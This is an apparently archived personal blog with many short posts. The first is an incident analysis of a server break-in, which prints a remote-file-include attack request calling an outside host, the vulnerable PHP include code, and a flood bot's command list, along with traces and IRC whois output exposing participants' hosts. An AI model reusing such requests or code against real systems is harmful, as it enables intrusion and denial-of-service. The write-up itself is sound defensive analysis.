    EUID(9113), parent (php:30434) UID(9113) EUID(9113)
    Aug 12 23:13:15 heeps grsec: From 65.102.167.50: exec of /tmp/dsadas
    (/tmp/dsadas ) by (sh:4796) UID(9113) EUID(9113), parent (sh:26669)
    UID(9113) EUID(9113)
    Aug 12 23:13:15 heeps grsec: From 65.102.167.50: exec of
    /tmp/upxDC5HNIQAEV2 (deleted) (/tmp/dsadas ) by (dsadas:4796)
    UID(9113) EUID(9113), parent (sh:26669) UID(9113) EUID(9113)
    Aug 12 23:13:15 heeps grsec: From 65.102.167.50: exec of /bin/rm (rm
    -f /tmp/dsadas ) by (sh:9657) UID(9113) EUID(9113), parent (sh:26669)
    UID(9113) EUID(9113)

    Fairly standard. Unfortunately we didn't have the binary (it was deleted) and it was killed before we remembered to grab it out of /proc.

    Looking in the logs:

    www.union.ic.ac.uk 65.102.167.50 - - [12/Aug/2004:23:13:15 +0100] "GET
    /medic/music/index.php?id=http://65.102.167.50:113/&width=http://65.102.167.50:113/
    HTTP/1.0" 200 48920 "-" "Lynx/2.8.3dev.8 libwww-FM/2.14"

    So it wasn't phpBB. There's a first. (nb: I'm sure that recent versions of phpBB are wonderfully quickly patched etc, but most of our users can't be bothered to keep track of recent versions.) The code at fault was fairly obvious:

    if ($_GET['eventreview']) { @include "8.php" ; $id="8.php"; } elseif ($event)
    {@include "2.php"; $id="2.php";} elseif  (!$id) { @include "1.php";
    $id="1.php" ; } else { include "$id"; } ;

    It include'd a user-controlled string and someone just pointed it at an external webserver. Boilerplate.
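
    One common way to close this kind of hole is to never hand the request parameter to include at all, and to look it up in a fixed table instead. A minimal sketch of the idea, written in Python rather than PHP to keep it self-contained; the file names mirror the snippet, while the keys and the function name are made up:

```python
# Fixed table of pages the script is willing to serve (file names from the
# snippet; the short keys are hypothetical).
ALLOWED_PAGES = {"1": "1.php", "2": "2.php", "8": "8.php"}
DEFAULT_PAGE = "1.php"

def resolve_page(requested_id):
    """Map a user-supplied id to a known local file, never to the raw string."""
    if requested_id is None:
        return DEFAULT_PAGE
    return ALLOWED_PAGES.get(requested_id, DEFAULT_PAGE)

print(resolve_page("2"))                          # 2.php
print(resolve_page("http://65.102.167.50:113/"))  # 1.php
```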

    Further information in the logs showed that most of the server had been crawled a few days beforehand. Any URLs with parameters in them were tried again while replacing the parameter value with an external php file which ran id or uname -a. Looks like an automated crawler designed to find scripts with these holes. This crawl was coming from a number of different hosts, using a number of different external values.
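
    Probes like that are easy to pick out of an access log after the fact. A rough sketch, assuming the log format of the excerpt shown earlier; the regular expression and the function name are my own and will miss anything encoded more cleverly:

```python
import re
from urllib.parse import urlsplit, parse_qsl

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def remote_include_probes(log_lines):
    """Yield (path, parameter, value) for query values that look like URLs."""
    for line in log_lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue
        url = urlsplit(match.group(1))
        for name, value in parse_qsl(url.query):
            if value.lower().startswith(("http://", "https://", "ftp://")):
                yield url.path, name, value

# The log entry from the excerpt, joined back onto one line.
sample = ('www.union.ic.ac.uk 65.102.167.50 - - [12/Aug/2004:23:13:15 +0100] '
          '"GET /medic/music/index.php?id=http://65.102.167.50:113/'
          '&width=http://65.102.167.50:113/ HTTP/1.0" 200 48920 "-" '
          '"Lynx/2.8.3dev.8 libwww-FM/2.14"')
hits = list(remote_include_probes([sample]))
```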

    Ok, fine. Email the owner of the source IP address (probably a compromised box), disable the offending code, email the owner of said code. Easy. Done.

    Sam collected together some random files owned by the compromised account in /tmp. Of these, there was a binary called moo. Strings suggests that it's an IRC controlled flood bot:

    NOTICE %s :TSUNAMI <target> <secs>                          = Special packeter that wont be blocked by most firewalls
    NOTICE %s :PAN <target> <port> <secs>                       = An advanced syn flooder that will kill most network drivers
    NOTICE %s :UDP <target> <port> <secs>                       = A udp flooder
    NOTICE %s :UNKNOWN <target> <secs>                          = Another non-spoof udp flooder
    NOTICE %s :NICK <nick>                                      = Changes the nick of the client
    NOTICE %s :SERVER <server>                                  = Changes servers
    NOTICE %s :GETSPOOFS                                        = Gets the current spoofing
    NOTICE %s :SPOOFS <subnet>                                  = Changes spoofing to a subnet
    

    Ok, semi interesting. A few hours later (I am supposed to do some work at Google sometimes!) I came back to check around. Everything looks ok, though ifconfig is showing a lot of traffic. lsof -i -n … oh crap

    moo processes - flooding some poor bastard. (Did I say that heeps is on a 100Mb/s link to the Internet?).

    Panic. Kill them. Shutdown apache, vsftpd, everything. Move sshd onto a different port. Does ps auxw show anything odd? Nope. lsof or netstat? Nope. Packet counts? Epsilon. Root compromise? Possible; but ps auxw showed the moo processes - if that's a rootkit it sucks.

    Look in the logs:

    Aug 13 16:03:50 heeps grsec: From 155.198.78.202: exec of /tmp/moo (./moo ) by
    (bash:14746) UID(1246) EUID(1246), parent (bash:17808) UID(1246) EUID(1246)

    So the flooder process had been running for about six hours. No - I'm not even going to work out how much data you can push down a 100Mb/s link in six hours. UID 1246? That's Sam. Did he accidentally run the damn payload? Is the box rooted? Fundamentally, does moo do anything more than strings suggests? I need to know exactly what moo does.

    So set up a chroot jail here at Google. Put strace in it, su to a random UID and set up a firewall to stop that UID contacting the outside world.

    2808  open("/usr/dict/words", O_RDONLY) = -1 ENOENT (No such file or directory)
    2808  socket(PF_INET, SOCK_STREAM, IPPROTO_TCP) = 3
    2808  socket(PF_INET, SOCK_DGRAM, IPPROTO_IP) = 4
    2808  connect(4, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("0.0.0.0")}, 28) = 0
    2808  send(4, "\217Z\1\0\0\1\0\0\0\0\0\0\3irc\5efnet\2nl\4corp\6g"..., 46, 0) = -1 EPERM (Operation not permitted)
    2808  close(4)                          = 0
    2808  socket(PF_INET, SOCK_DGRAM, IPPROTO_IP) = 4
    2808  connect(4, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("0.0.0.0")}, 28) = 0
    2808  send(4, "\217Z\1\0\0\1\0\0\0\0\0\0\3irc\5efnet\2nl\4corp\6g"..., 46, 0) = -1 EPERM (Operation not permitted)
    2808  close(4)                          = 0
    2808  socket(PF_INET, SOCK_DGRAM, IPPROTO_IP) = 4
    2808  connect(4, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("0.0.0.0")}, 28) = 0
    2808  send(4, "\217Z\1\0\0\1\0\0\0\0\0\0\3irc\5efnet\2nl\4corp\6g"..., 46, 0) = -1 EPERM (Operation not permitted)
    2808  close(4)                          = 0
    2808  socket(PF_INET, SOCK_DGRAM, IPPROTO_IP) = 4
    2808  connect(4, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("0.0.0.0")}, 28) = 0
    2808  send(4, "\217[\1\0\0\1\0\0\0\0\0\0\3irc\5efnet\2nl\0\0\1\0\1", 30, 0) = -1 EPERM (Operation not permitted)
    2808  close(4)                          = 0
    2808  socket(PF_INET, SOCK_DGRAM, IPPROTO_IP) = 4
    2808  connect(4, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("0.0.0.0")}, 28) = 0
    2808  send(4, "\217[\1\0\0\1\0\0\0\0\0\0\3irc\5efnet\2nl\0\0\1\0\1", 30, 0) = -1 EPERM (Operation not permitted)
    2808  close(4)                          = 0
    2808  socket(PF_INET, SOCK_DGRAM, IPPROTO_IP) = 4
    2808  connect(4, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("0.0.0.0")}, 28) = 0
    2808  send(4, "\217[\1\0\0\1\0\0\0\0\0\0\3irc\5efnet\2nl\0\0\1\0\1", 30, 0) = -1 EPERM (Operation not permitted)
    2808  close(4)                          = 0
    ...

    That's edited a lot. It just started flooding DNS requests. So, I let it contact a DNS server and connect to irc.efnet.nl.
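
    The payloads in those send() calls are ordinary DNS queries, and the last, untruncated one can be decoded by hand. A small sketch of doing so; the helper name is mine and it only handles a single uncompressed question, which is all this packet contains:

```python
import struct

def parse_dns_query(packet: bytes):
    """Return (transaction id, name, qtype, qclass) for a one-question query."""
    txid, flags, qdcount = struct.unpack("!HHH", packet[:6])
    labels, pos = [], 12                     # the header is 12 bytes long
    while packet[pos] != 0:
        length = packet[pos]
        labels.append(packet[pos + 1:pos + 1 + length].decode("ascii"))
        pos += 1 + length
    qtype, qclass = struct.unpack("!HH", packet[pos + 1:pos + 5])
    return txid, ".".join(labels), qtype, qclass

# The 30-byte payload from the last send() in the trace; strace prints bytes
# in octal, so \217 is 0x8f and "[" is the literal byte 0x5b.
packet = b"\x8f[\x01\x00\x00\x01\x00\x00\x00\x00\x00\x00\x03irc\x05efnet\x02nl\x00\x00\x01\x00\x01"
txid, name, qtype, qclass = parse_dns_query(packet)
print(name, qtype, qclass)   # irc.efnet.nl 1 1
```

    Type 1, class 1 is a plain A record lookup in the IN class, so at this point it is only trying to resolve its IRC server.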

    2837  connect(3, {sa_family=AF_INET, sin_port=htons(6667), sin_addr=inet_addr("193.109.122.77")}, 16) = 0
    2837  setsockopt(3, SOL_SOCKET, SO_LINGER, NULL, 0) = -1 EINVAL (Invalid argument)
    2837  setsockopt(3, SOL_SOCKET, SO_REUSEADDR, NULL, 0) = -1 EINVAL (Invalid argument)
    2837  setsockopt(3, SOL_SOCKET, SO_KEEPALIVE, NULL, 0) = -1 EINVAL (Invalid argument)
    2837  write(3, "NICK MXQC\nUSER HNMKFQ localhost localhost :LTQQEFD\n", 51) = 51
    2837  select(4, [3], NULL, NULL, {1200, 0}) = 1 (in [3], left {1200, 0})
    2837  recv(3, "NOTICE AUTH :*** Looking up your hostname...\r\nNOTICE AUTH :*** Checking Ident\r\nNOTICE AUTH :*** Found your hostname\r\n", 4096, 0) = 117
    2837  select(4, [3], NULL, NULL, {1200, 0}) = 1 (in [3], left {1190, 600000})
    2837  recv(3, "NOTICE AUTH :*** No Ident response\r\n", 4096, 0) = 36
    2837  select(4, [3], NULL, NULL, {1200, 0}) = 1 (in [3], left {1199, 830000})
    2837  recv(3, "PING :936DFE7C\r\n", 4096, 0) = 16
    2837  write(3, "PONG :936DFE7C\n", 15)  = 15
    2837  select(4, [3], NULL, NULL, {1200, 0}) = 1 (in [3], left {1199, 820000})
    2837  recv(3, ":irc.efnet.nl 001 MXQC :Welcome to the EFnet Internet Relay Chat Network MXQC\r\n", 4096, 0) = 79
    2837  write(3, "MODE MXQC -xi\n", 14)   = 14
    2837  write(3, "JOIN #krowy :krowa\n", 19) = 19
    ...

    So it joins a private IRC channel. I can do that. A @google.com address got me banned pretty quickly. But not before I got a whois on everyone there:

    --- [FDMYSGLM] (GIWcF7CNSH@badboy.icyhost.com) : UUTIDJJH
    --- [FDMYSGLM] @#krowy 
    --- [FDMYSGLM] irc.efnet.nl :Business Internet Trends IPv4/IPv6 EFNet server
    --- FDMYSGLM 66.98.130.9 :actually using host
    --- [FDMYSGLM] idle 49:13:19, signon: Tue Aug 10 15:54:49
    --- [FDMYSGLM] End of WHOIS list.
    --- [forger] (konrad@aay116.neoplus.adsl.tpnet.pl) : I'm too lame to read mirc.hlp
    --- [forger] #hihaho #test45 @#krowy 
    --- [forger] irc.efnet.pl :Discover a lost art - www.marillion.com
    --- [forger] End of WHOIS list.
    --- [its`me] (~ludziu@nat-0.infoland.int.pl) : ^=^
    --- [its`me] @#krowy 
    --- [its`me] irc.efnet.pl :Discover a lost art - www.marillion.com
    --- [its`me] End of WHOIS list.
    --- [MQJJEBR] (~WTKC@pc-212-51-219-2.p.lodz.pl) : DILLEUN
    --- [MQJJEBR] @#krowy 
    --- [MQJJEBR] irc.efnet.nl :Business Internet Trends IPv4/IPv6 EFNet server
    --- MQJJEBR 212.51.219.2 :actually using host
    --- [MQJJEBR] idle 49:13:27, signon: Tue Aug 10 16:01:19
    --- [MQJJEBR] End of WHOIS list.
    --- [ori00n] (h4x0r@dial-770.wroclaw.dialog.net.pl) : l33t
    --- [ori00n] #test45 #cc @#krowy 
    --- [ori00n] irc.efnet.pl :Discover a lost art - www.marillion.com
    --- [ori00n] End of WHOIS list.
    --- [YDMOCCRO] (~KQFU@banks.su.nottingham.ac.uk) : JHASTZIH
    --- [YDMOCCRO] @#krowy 
    --- [YDMOCCRO] irc.efnet.nl :Business Internet Trends IPv4/IPv6 EFNet server
    --- YDMOCCRO 128.243.90.87 :actually using host
    --- [YDMOCCRO] idle 49:13:32, signon: Tue Aug 10 16:48:28
    --- [YDMOCCRO] End of WHOIS list.
    --- [agl] (~agl@216-239-45-4.google.com) : agl
    --- [agl] #krowy 
    --- [agl] irc.efnet.nl :Business Internet Trends IPv4/IPv6 EFNet server
    --- agl 216.239.45.4 :actually using host
    --- [agl] idle 00:00:49, signon: Fri Aug 13 14:07:34
    --- [agl] End of WHOIS list.
    --- [MITPIXPN] (~BJSAQXGU@211.239.197.130) : MIHSH
    --- [MITPIXPN] #krowy 
    --- [MITPIXPN] irc.efnet.nl :Business Internet Trends IPv4/IPv6 EFNet server
    --- MITPIXPN 211.239.197.130 :actually using host
    --- [MITPIXPN] idle 00:18:13, signon: Fri Aug 13 13:50:23
    --- [MITPIXPN] End of WHOIS list.
    --- [NKKXLTC] (www-data@rei.animehq.hu) : WSOV
    --- [NKKXLTC] #krowy 
    --- [NKKXLTC] irc.efnet.nl :Business Internet Trends IPv4/IPv6 EFNet server
    --- NKKXLTC 195.70.50.20 :actually using host
    --- [NKKXLTC] idle 00:19:31, signon: Fri Aug 13 13:49:00
    --- [NKKXLTC] End of WHOIS list.
    --- [PHQW] (~FNWDDYH@dsl-213-023-046-090.arcor-ip.net) : SYEV
    --- [PHQW] #krowy 
    --- [PHQW] irc.efnet.nl :Business Internet Trends IPv4/IPv6 EFNet server
    --- PHQW 213.23.46.90 :actually using host
    --- [PHQW] idle 00:11:23, signon: Fri Aug 13 13:57:17
    --- [PHQW] End of WHOIS list.
    --- [VQMVYOHE] (~WEEBA@211.239.197.130) : HBQFDHTF
    --- [VQMVYOHE] #krowy 
    --- [VQMVYOHE] irc.efnet.nl :Business Internet Trends IPv4/IPv6 EFNet server
    --- VQMVYOHE 211.239.197.130 :actually using host
    --- [VQMVYOHE] idle 00:18:09, signon: Fri Aug 13 13:50:34
    --- [VQMVYOHE] End of WHOIS list.

    Looks like forger is running the game as he quickly kicks the jailed moo bot that I'm running (also from @google.com). He then changes his nick to shitniz, like it will help.

    But thankfully moo seems to do exactly what it says on the tin, so it's probably not a problem. Oh, and that channel is now invite-only. I guess he got scared. shitniz is still there though.

    Patch to add SPF to Gento...

    Patch to add SPF to Gentoo qmail.

    Based on http://www.saout.de/misc/spf/

    Gmail backending

    Did you know that .org pushes now happen about every 5 minutes? I was certainly pretty surprised last night. Now if only they didn't have silly registration and server number restrictions at the gTLD level the DNS system might not be a complete pile of doggy poo.

    And the reason why I was playing with DNS is that IV now has a new mail server. Say hello to zool.imperialviolet.org everyone, the third server to have an .imperialviolet.org name (I wonder if anyone here remembers tzu and metis?). Hopefully this should fix the mail bouncing problems that dodo was having. And, if anyone wants hosting for mail servers etc., now is the time to ask.

    The switch of servers has broken automatic email bots (that's comments and keyverify), but I'm running them manually at the moment so you can still use them all the same. And boy do people use keyverify a lot. I wasn't expecting any traffic but I've had to deal with about 10 messages today from that.

    I was being a little silly yesterday. If one was going to implement a new backend for the gmail javascript, there's an obvious choice ... gmail. Gmail does a perfect job of storing and sorting mail, just forward the queries onto them!

    Before you wonder what the hell the point is of re-backending gmail only to forward everything to the real gmail, remember the motivation. I want email messages to be sent from the right place, with the right From address. So all I have to do is intercept the "send email" POST and a) send the email from zool and b) send it on to gmail with a blackhole email address.

    That's it. Now, if you don't like the idea of gmail storing your email then you really do have to do the whole thing. But I know that gmail stores lots of copies of my mail and that they aren't profiling it. For the moment I'm happy with Google managing my email and this simple solution is great (I think that would go for many people).

    But after a while, someon...

    But after a while, someone needs to make a change, and inevitably, they break your code. Do you suppose they'll notice? Not likely. But you will, when google.com starts serving elephant porn on 11 million searches. Stop elephant porn before it starts by writing unit tests for all your code.

    Why hasn't anyone back-en...

    Why hasn't anyone back-ended gmail? Seriously, it's a client side app, that means you can take the javascript and reimplement the server. It's not that hard! Lots of people seem to be doing different clients for gmail (injectors, notifiers etc) - but I want a different backend!

    I don't want my address to be @gmail (and Reply-To isn't good enough). At the moment the server which handles imperialviolet.org email is upset so I don't even have my Reply-To set. But I'm switching to a different server soon and I want a gmail server to install!

    Seriously, it's easy, I implemented a NULL backend for gmail in about 30 minutes. The list of email is static and nothing actually works but all the data looks like:

    D(["t",["fe4e30d37ca51d9",0,0,"7:11am","\<span id=\'_user_rmages@linux-azur.org\'\>Rene Mages\</span\>","&nbsp;","Software Patents : Postcard Action",
    "Hi all, Probably, the EU Software patent Directive should return to the European Parlement during &hellip;",[]
      ,"","fe4e30d37ca51d9",0]

    It's not that tough. Python provides mailbox parsing, IMAP clients etc (if you want).

    Unfortunately, I don't have the time.

    Storage for archive.org...

    Storage for archive.org

    A quick commentary on the...

    A quick commentary on the letter sent by many attorneys general to the `peer-to-peer software' producers.

    At present, P2P software has too many times been hijacked by those who use it for illegal purposes to which the vast majority of our consumers do not wish to be exposed.

    I hate to point out that the reason that most people use P2P networks is to be exposed to these `illegal purposes'. Look at the usage numbers for Napster before and after it went `legal'.

    P2P file-sharing technology works by allowing consumers to download free software that enables them to directly share files stored on their hard drive with other users. This type of direct access to one's computer differentiates P2P file-sharing technology from garden-variety e-mail accounts and commercial search engines such as Google and Yahoo.

    As opposed to the bleeding obvious differences between P2P and email/search engines?

    One substantial and ever-growing use of P2P software is as a method of disseminating pornography, including child pornography.

    Yep. True at least.

    Consequently, P2P users need to be made aware that they are exposing themselves, and their children, to widespread availability of pornographic material when they download and install P2P file-sharing programs on their computers.

    While sensible, I'm guessing that most people realise this. Esp. after their first IE session, after which they are left with dozens of popup windows of porn.

    Furthermore, P2P file-sharing technology can allow its users to access the files of other users, even when the computer is "off".

    Seriously, no. It really can't.

    P2P users, including both home users and small businesses, who do not properly understand this software have inadvertently given other P2P users access to tax returns, medical files, financial records, personal e- mail, and confidential documents stored on their computers. ... Consequently, P2P users need to be properly educated so that they will not inadvertently share personal files on their hard drives with other users of your P2P file-sharing technology.

    And this is small fry when compared to the amount of information leaked by viruses, photocopiers and leaving one's briefcase on the roof of the car as you drive away. (And, in the case of the British secret service, leaving your laptop in the pub). Since when do attorneys general bother themselves with people being stupid?

    The illegal uses of P2P technology are having an adverse impact on our States consumers, economies, and general welfare.

    Of course, this statement is asserted without justification and is debatable at best.

    P2P file-sharing programs also are being used to illegally trade copyrighted music, movies, software, and video games, contributing to economic losses. The Business Software Alliance estimates that its members lost $13 billion in revenue last year due to software piracy. According to a February 20, 2004 CNN article, U.S. software companies lose up to $12 billion a year in piracy according to the Software and Information Industry Association. Music companies lost more than $4.6 billion worldwide last year, according to the RIAA [Recording Industry Association of America] and movie industry officials pegged their annual losses from bootlegged films at more than $3.5 billion.

    At least here they give their sources, and what independent sources they are too. Generally `losses', as calculated in these figures, are an estimate of the number of copied works (rounded up) times the retail cost, which assumes that every download is a lost sale.

    We would ask you to take concrete and meaningful steps to avoid the infringement of the privacy and security of our citizens by bundling unwanted spyware and adware with your software.

    I don't think they actually meant what they wrote here, but it's at least a little ray of light if I'm reading it (in)correctly.

    Encryption only reinforces the perception that P2P technology is being used primarily for illegal ends. Accordingly, we would ask you to refrain from making design changes to your software that prevent law enforcement in our States from investigating and enforcing the law.

    I think that law-enforcement already has plenty of powers to deal with this - up to and including installing keyloggers on suspects' computers.

    We believe that meaningful steps can and should be taken by the industry to develop more adequate filters capable of better protecting P2P parents and children from unwanted or offensive material. Not warning parents about the presence of, and then reasonably providing them with the ability to block or remove, obscene and illegal materials from their computers is a serious threat to the health and safety of children and families in our States.

    What the hell are `P2P parents'? Most of the parents I know are of the regular kind, and that kind are perfectly capable of supervising their children.

    Lots of Python magicHolog...

    Subway

    It seems that Subways are breeding like Starbucks these days. And I kind of understand why, they are certainly a step up (quality wise) from McDonalds and those of that ilk. But, in the UK, I avoid them because buying anything is too stressful.

    Subway take the idea of choice very seriously - you can choose your bread, your type of cheese, your toppings, almost anything. But cost pressure means that they are usually staffed by foreign workers; and foreign workers are great, esp female ones. But they often don't have the soundest grasp of English.

    A Subway visit usually consists of a whole barrage of questions in semi-English with a queue of people behind you. Since I have no idea what they're saying I usually resort to answering "Please", "No thanks", "Not today thanks", ... randomly. And often they don't understand my reply so I end up getting something that I didn't ask for and didn't know what it was in the first place. It's astounding that, with all this confusion, I don't end up with a 9 foot sub packed full of strawberry jam, condensed milk and ready salted crisps.

    But I've now discovered the driving force behind Subway - Californian workers. It's almost sickening how pleasant Californian shop assistants are. Buying a carton of milk involves, at least, "Hi! How are you? What a great day! Let me ring those up for you. So that's three bucks ... that's great. There you go, there's your milk. Have a wonderful weekend! No really, have a really great weekend - hope to see you again. Bye now!".

    I fear that if I ever find a shop assistant in this place who tells me to fuck off I'll end up dancing in the street with glee.

    But it seems that working at Subway is boring enough to take some of the edge off whatever drugs the people round here are on - but leave someone who can speak English. And since I now know what the hell I'm asking for I actually get a decent meal.

    Which is good, because all the shops round here seem to sell by the metric tonne. Thank god Google feeds me the rest of the time.

    Ohh, PyBloom made the del...

    Ohh, PyBloom made the del.icio.us popular list. Ahh, the feeling of a little fame.

    Bloom filters

    In reply to The Register: Archive.org suffers Fahrenheit 911 memory loss:

    > But just hours after putting up the movie, Archive.org pulled it down
    
    Although Moore is the creator of the film, that doesn't mean that he holds the
    copyright. The copyright law is very broken. Archive.org knows this and is
    doing its best to fix it[1]. However, organisations are still bound by the
    rule of law.
    
    [1] http://www.archive.org/about/dmca.php
    
    > "Then, it called Archive.org to remove any trace of the interview at all".
    
    Given that there's a six month delay till content hits the Wayback Machine, I
    very much doubt that.
    
    > "and how a "library" can obey this request defies comprehension"
    
    Welcome, once again, to the law. I'm sorry that archive.org doesn't do the
    Right Thing - irrespective of the law. We would all like several aspects of the
    law to be changed, but the way to do that is quite well known. Small
    organisations which break the law don't change it - they cease to exist.
    
    You know, if you want to host all the copyrighted content in the US, for free
    and take on the RIAA + MPAA etc. Go ahead and fund it. I'm guessing that you're
    not willing to take that personal risk. You'll just keep attacking others for
    not doing it for you.
    
    Archive.org isn't perfect - it's struggling to archive all the content that it
    legally can without the funds or the lawyers to do so. But it's trying.
    
    Next time it's a slow news day - take a walk.
    
    AGL

    There doesn't (for some strange reason) seem to be any good Python source for Bloom filters. There's a Sourceforge project, but that uses mpz for hashing, which is deprecated. So I've written PyBloom which implements counting and standard bloom filters.
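
    For anyone who hasn't met them, here is a rough sketch of the two kinds of filter. This is not PyBloom's code or API: the class names, the default sizes and the use of SHA-256 with a per-hash prefix are all assumptions made for the example, and items are expected to be bytes.

```python
import hashlib


class BloomFilter:
    """Standard Bloom filter: each item sets k positions in an m-slot array."""

    def __init__(self, num_bits=1024, num_hashes=4):
        self.num_bits = num_bits
        self.num_hashes = num_hashes
        self.bits = bytearray(num_bits)  # one byte per slot, for clarity

    def _positions(self, item):
        # Derive k positions by hashing the item with a different prefix each time.
        for i in range(self.num_hashes):
            digest = hashlib.sha256(b"%d:" % i + item).digest()
            yield int.from_bytes(digest[:8], "big") % self.num_bits

    def add(self, item):
        for pos in self._positions(item):
            self.bits[pos] = 1

    def __contains__(self, item):
        # Can give a false positive, never a false negative.
        return all(self.bits[pos] for pos in self._positions(item))


class CountingBloomFilter(BloomFilter):
    """Counting variant: each slot is a small counter, so items can be removed."""

    def add(self, item):
        for pos in self._positions(item):
            self.bits[pos] = min(self.bits[pos] + 1, 255)  # saturate at one byte

    def remove(self, item):
        if item not in self:
            raise KeyError(item)
        for pos in self._positions(item):
            self.bits[pos] -= 1
```

    The counting version trades space (a counter per slot rather than a bit) for the ability to delete.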

    Well, the kernel patch I ...

    Well, the kernel patch I need to implement capability systems has been written by Andrea Arcangeli.

    Stackless twisted Python ...

    Stackless twisted Python proof-of-concept code that I wrote today.

    Toilets at Google

    MD5 cracking in seconds

    The toilets at Google have no fewer than 22 buttons (yep, I did count them). As wiping one's own butt is obviously far too great a burden these days, these toilets have a little `wand' that can come out and spray water up your arse (or at the front for the girls ... or the boys I suppose) - that's 5 buttons.

    The seat and spray water are also heated (4 buttons) and the wand can be moved back and forth (2 more). It can self-clean (many buttons) and do stuff on a timer. It even has a button to flush!

    Frankly - I can't write about most of the stuff that goes on here so that's why I'm talking about the toilets. But I'm doing great :)

    Got here - not dead

    Well - in-flight entertainment keeps getting better every time I fly. Today I had full video on demand with a good selection of films and that makes the flight so much nicer. Now, you may be one of those people who can sleep on planes - but I'm not. I need something .. anything .. to do and Virgin Atlantic now has my custom until I hear that someone else does it better.

    Unfortunately, the good flight was balanced by a god-awful customs line. It wasn't that they gave me a hard time (I did have to give two fingerprints though) but it was training day. And thus everything went very slowly. Very, very slowly.

    Yay! Unsecured wireless a...

    Yay! Unsecured wireless access point at home! Unfortunately, I have to balance my laptop on a box, on the window ledge for it to work. But it's a good 60KB/s link.

    So, thanks to that and the (not as good as emerge, but still ok) apt-get my old laptop now has X 4.3.0 with subpixel rendering and Firefox 0.9.

    Also, it seems that people don't like the Speex codec - I guess technical quality isn't everything so I'll upload the raw WAVs for the NotCon talk tonight. (Assuming someone doesn't turn this AP off).

    For anyone who has ever w...

    For anyone who has ever wondered what the picture and quote at the top of the front page was all about, then see today's featured article on Wikipedia.

    I have far too little tim...

    I have far too little time to do this properly, but I've managed to do a little of the NotCon cutting. There were a lot of cool people there - some of them were even speaking, but Brewster Kahle's Talk blew me away. I really think that everyone should listen to this.

    (Speex codec homepage ← the codec that I used)

    I'm tidying up, ready to ...

    I'm tidying up, ready to move home. Just next to my desk I've a piece of paper upon which I scribble down words that I don't know and later I lookup the definitions. Since any scrap of paper will get lost in the move I've typed it up:

    chutzpah utter nerve
    trite lacks power because of overuse
    churl a bad tempered person
    entheogenesis creating the divine within
    paragon excellence, a peerless example
    experiential from experience
    exonym a name given by secondary persons
    Mesopotamia between the rivers (Greek)
    panspermia interplanetary seeding
    monograph definitive work on the subject
    miscegenation breeding between whites and non-whites

    Firstly, you can stop ema...

    Firstly, you can stop emailing me about gmail invites now. I've gone through nine of them and I've run out. However, pretty much all of Dramsoc has an account now.

    Gary is still copying the recording of NotCon onto a hard drive - so that's not done either.

    I've just been busy with nothing in particular and nothing particularly interesting. I've just posted a Python module for finding the maximal flow in networks if anyone is interested.
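
    For the curious, maximal flow can be sketched in a few dozen lines. The version below uses the Edmonds-Karp method (breadth-first augmenting paths), which is a textbook choice and not necessarily what the posted module does; the `max_flow` name and the dict-of-dicts graph layout are assumptions for the example.

```python
from collections import deque


def max_flow(capacity, source, sink):
    """Edmonds-Karp: push flow along shortest augmenting paths until none remain.

    `capacity` maps u -> {v: capacity of the edge u->v}.
    """
    if source == sink:
        return 0
    # Residual capacities, with a zero-capacity reverse edge for every edge.
    residual = {source: {}, sink: {}}
    for u, edges in capacity.items():
        for v, cap in edges.items():
            residual.setdefault(u, {})
            residual.setdefault(v, {})
            residual[u][v] = residual[u].get(v, 0) + cap
            residual[v].setdefault(u, 0)

    total = 0
    while True:
        # Breadth-first search for a path that still has spare capacity.
        parent = {source: None}
        queue = deque([source])
        while queue and sink not in parent:
            u = queue.popleft()
            for v, cap in residual[u].items():
                if cap > 0 and v not in parent:
                    parent[v] = u
                    queue.append(v)
        if sink not in parent:
            return total

        # Find the bottleneck on the path, then update the residual graph.
        bottleneck = float("inf")
        v = sink
        while parent[v] is not None:
            bottleneck = min(bottleneck, residual[parent[v]][v])
            v = parent[v]
        v = sink
        while parent[v] is not None:
            u = parent[v]
            residual[u][v] -= bottleneck
            residual[v][u] += bottleneck
            v = u
        total += bottleneck


# A small made-up network: s feeds a and b, both drain to t.
example = {"s": {"a": 3, "b": 2}, "a": {"b": 1, "t": 2}, "b": {"t": 3}}
```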

    And would people please get "that", "which" and "who" the right way round? Correct examples:

    • The cats that are blue have hair. (exclusive clauses use "that")
    • The cats, which are blue, have hair. (non-exclusive clauses use "which". Note that the last sentence means "cats that are blue"→"have hair" but this one means cats→have hair & cats→are blue.)
    • The people who are blue have hair. (Talking about people means you use "who")

    That is all.

    Ok, so I should write mor...

    Ok, so I should write more about NotCon and things ... but I'm not going to at the moment.

    But I do have a gmail invite. Who wants it? (email me).

    Questioning the parties about Software Patents

    Since the European elections are coming up on June 10th I decided to ring round and ask some of the parties about their policy on software patents.

    • Greens: Firmly against as a general policy (the person I spoke to didn't know any details). Sent me an email with these links. "the Green Party is against the idea of extending patents to software"
    • Lib Dems: First person I rang had no idea what I was talking about. Gave me a foreign number with a very knowledgeable person on the end. Basically they want a clearer law (were unhappy that the current law was being too widely interpreted) and wish to `strike a balance'. Were clear that the US system was flawed and that the patent office was overworked. But still believed that small business needed to be able to hold patents on inventions (inc software).
    • Conservatives: Bounced twice till someone could answer the question and even then they just read out a prepared statement. There was little point in questioning as the poor guy didn't have a clue what he was talking about. The statement basically said that they were unhappy with the current state of play because they wanted more patents, though they recognise that the US system is out of balance etc.

    Hmm...

    If Bruce Sterling actually wrote the comment in this then he should be ashamed. Only when preaching to the most devout choir can one get away with such crap.

    "Here's what we do know about NV45, it's currently running at a 450MHz core clock with 1.1GHz GDDR3 memory"

    ... graphics cards are now running faster than (one of) my CPUs.

    I need to stop reading the news...

    Because it just raises my blood pressure too much.

    I need a simple search bot that can pick out stories complaining of "bypassing" "revenue", like they have a right to a profit and shouldn't have to work for it, and replace them with <h1>MORONS</h1>

    Well, I said that I'd wri...

    Well, I said that I'd write to the returning officer about the stupid London Mayor elections, and here it is. Final comments in before tomorrow morning please (because that's when I post it).

    Ok, so I've only just rea...

    Ok, so I've only just realised where the name Samizdata comes from. I feel silly.

    I also intend to write to the returning officer for the London Mayor elections to ask where the hell their election system comes from:

